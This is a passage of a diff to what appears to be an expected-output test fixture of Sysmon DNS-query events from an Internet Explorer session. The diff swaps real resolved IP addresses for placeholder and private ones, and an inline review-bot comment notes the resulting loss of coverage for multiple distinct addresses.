Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -7322,7 +7322,7 @@ "ProcessId": "2736", "QueryName": "tags.bluekai.com", "QueryStatus": "0", - "QueryResults": "type: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;", + "QueryResults": "type: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -7350,7 +7350,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -7362,7 +7362,7 @@ "ProcessId": "2736", "QueryName": "cdnjs.cloudflare.com", "QueryStatus": "0", - "QueryResults": "::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "version": 5, 
@@ -7389,7 +7389,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7404,7 +7404,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.051", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7445,7 +7445,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.054", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -7461,7 +7461,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7495,7 +7495,7 @@ "ProcessId": "2736", "QueryName": "ocsp.trust-provider.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" } }, 
@@ -7503,7 +7503,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -7518,7 +7518,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "time_created": "2019-07-18T03:34:10.067Z", 
@@ -7527,7 +7527,7 @@
 "ProcessId": "2736",
 "QueryName": "ocsp.comodoca4.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:09.184"
 },
@@ -7576,7 +7576,7 @@
 "ProcessId": "2736",
 "QueryName": "sync.crwdcntrl.net",
 "QueryStatus": "0",
- "QueryResults": "type: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;",
+ "QueryResults": "type: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:09.322"
 },
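Review bot: The new `QueryResults` for `sync.crwdcntrl.net` in the second hunk here replaces eight distinct upstream addresses with `::ffff:89.160.20.156` repeated eight times, so this expected record no longer covers the case of several different resolved addresses in one event; the `syndication.twitter.com` hunk at `@@ -7829,7 +7829,7 @@` collapses four addresses the same way. If the supported subset offers more than one address, using distinct ones would keep that coverage, and it would also keep the expectation sensitive to any de-duplication the pipeline applies to repeated addresses. This looks like a regenerated expected-output fixture, in which case the adjustment belongs in the corresponding input sample with the fixture regenerated afterwards, but the file header is outside this chunk and I cannot confirm that.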
@@ -7594,7 +7594,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files 